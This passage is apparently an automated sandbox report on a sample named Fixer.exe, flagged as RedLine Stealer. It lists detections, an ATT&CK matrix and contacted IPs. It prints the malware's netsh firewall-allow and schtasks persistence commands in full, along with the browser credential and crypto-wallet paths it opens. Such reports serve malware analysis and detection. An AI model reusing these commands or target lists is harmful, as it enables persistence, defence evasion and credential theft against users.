                  Source: C:\Windows\System32\Defender.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\Defender.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 3_2_00007FF848F270FA rdtsc 3_2_00007FF848F270FA
                  Source: C:\Users\user\Desktop\Fixer.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\Fixer.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess created: C:\Users\user\AppData\Local\Temp\FixerNerest.exe "C:\Users\user\AppData\Local\Temp\FixerNerest.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exitJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exitJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Users\user\Desktop\Fixer.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeQueries volume information: C:\Users\user\AppData\Local\Temp\FixerNerest.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\Defender.exeQueries volume information: C:\Windows\System32\Defender.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\Defender.exeQueries volume information: C:\Windows\System32\Defender.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Fixer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Modifies the windows firewall
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit
                  Source: Amcache.hve.14.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.14.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.14.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: FixerNerest.exe, 00000004.00000002.2386714575.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 0000000B.00000002.2582504451.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2761764861.000000001B100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: Amcache.hve.14.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: Fixer.exe, type: SAMPLE
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.0.Fixer.exe.fd0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1999968498.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Fixer.exe PID: 2520, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLR]q
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR]ql
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus Movement Inc1
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q%appdata%`,]qdC:\Users\user\AppData\Roaming`,]qdC:\Users\user\AppData\Roaming\Binance
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q&%localappdata%\Coinomi\Coinomi\walletsLR]q
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                  Source: Yara matchFile source: 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Fixer.exe PID: 2520, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: Fixer.exe, type: SAMPLE
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.0.Fixer.exe.fd0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1999968498.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Fixer.exe PID: 2520, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts321
                  Windows Management Instrumentation                  		1
                  Scheduled Task/Job                  		11
                  Process Injection                  		121
                  Masquerading                  		1
                  OS Credential Dumping                  		451
                  Security Software Discovery                  		Remote Services1
                  Screen Capture                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		1
                  Scheduled Task/Job                  		11
                  Disable or Modify Tools                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		11
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		351
                  Virtualization/Sandbox Evasion                  		Security Account Manager351
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin Shares3
                  Data from Local System                  		1
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Obfuscated Files or Information                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeylogging12
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Software Packing                  		Cached Domain Credentials213
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Timestomp                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585853 Sample: Fixer.exe Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 49 et-seattle.gl.at.ply.gg 2->49 55 Suricata IDS alerts for network traffic 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 11 other signatures 2->61 9 Fixer.exe 20 7 2->9         started        14 Defender.exe 2 2->14         started        16 Defender.exe 2->16         started        signatures3 process4 dnsIp5 51 89.23.97.121, 1112, 1911, 49704 MAXITEL-ASRU Russian Federation 9->51 43 C:\Users\user\AppData\...\FixerNerest.exe, PE32 9->43 dropped 45 C:\Users\user\...\6z9uno0baqvej0me.exe, PE32 9->45 dropped 47 C:\Users\user\AppData\Local\...\Fixer.exe.log, ASCII 9->47 dropped 75 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 9->75 77 Found many strings related to Crypto-Wallets (likely being stolen) 9->77 79 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 9->79 85 2 other signatures 9->85 18 FixerNerest.exe 2 9->18         started        22 6z9uno0baqvej0me.exe 1 9->22         started        53 et-seattle.gl.at.ply.gg 147.185.221.24, 49832, 49991, 61069 SALSGIVERUS United States 14->53 81 Antivirus detection for dropped file 14->81 83 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 14->83 24 WerFault.exe 19 16 14->24         started        26 WerFault.exe 16->26         started        file6 signatures7 process8 file9 41 C:\Windows\System32\Defender.exe, PE32 18->41 dropped 63 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 18->63 65 Machine Learning detection for dropped file 18->65 67 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->67 73 3 other signatures 18->73 28 cmd.exe 1 18->28         started        31 cmd.exe 1 18->31         started        33 WmiPrvSE.exe 18->33         started        69 Antivirus detection for dropped file 22->69 71 Queries memory information (via WMI often done to detect virtual machines) 22->71 signatures10 process11 signatures12 87 Uses schtasks.exe or at.exe to add and modify task schedules 28->87 35 conhost.exe 28->35         started        37 conhost.exe 31->37         started        39 schtasks.exe 1 31->39         started        process13

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Fixer.exe74%VirustotalBrowse
                  Fixer.exe68%ReversingLabsByteCode-MSIL.Trojan.RedLineStealz
                  Fixer.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe100%AviraHEUR/AGEN.1310090
                  C:\Windows\System32\Defender.exe100%AviraTR/Crypt.OPACK.Gen
                  C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\FixerNerest.exe100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://89.23.97.121:19110%Avira URL Cloudsafe
                  89.23.97.121:11120%Avira URL Cloudsafe
                  http://ocsp.sectigo.com0$0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  et-seattle.gl.at.ply.gg
                  		147.185.221.24
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    89.23.97.121:1112true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/02/sc/sctFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://duckduckgo.com/chrome_newtabFixer.exe, 00000000.00000002.2220918461.00000000042DB000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=Fixer.exe, 00000000.00000002.2220918461.00000000042DB000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drfalse
                                		high
                                http://tempuri.org/Entity/Id14ResponseDFixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://89.23.97.121:1911Fixer.exe, 00000000.00000002.2202938412.000000000360E000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003604000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://tempuri.org/Entity/Id23ResponseDFixer.exe, 00000000.00000002.2202938412.0000000003572000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id12ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drfalse
                                          		high
                                          http://tempuri.org/Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id2ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://tempuri.org/Entity/Id21ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://tempuri.org/Entity/Id9Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://tempuri.org/Entity/Id8Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://tempuri.org/Entity/Id6ResponseDFixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://tempuri.org/Entity/Id5Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://tempuri.org/Entity/Id4Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Entity/Id7Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://purl.oenFixer.exe, 00000000.00000002.2248608403.0000000009490000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://tempuri.org/Entity/Id6Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/Entity/Id19ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://tempuri.org/Entity/Id24ResponseDFixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://tempuri.org/Entity/Id13ResponseDFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/faultFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsatFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://tempuri.org/Entity/Id15ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://tempuri.org/Entity/Id5ResponseDFixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000004.00000002.2386899345.00000000027E6000.00000004.00000800.00020000.00000000.sdmp, Defender.exe, 0000000B.00000002.2583497749.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2754426575.0000000002546000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://tempuri.org/Entity/Id6ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://api.ip.sb/ipFixer.exefalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/scFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://tempuri.org/Entity/Id1ResponseDFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
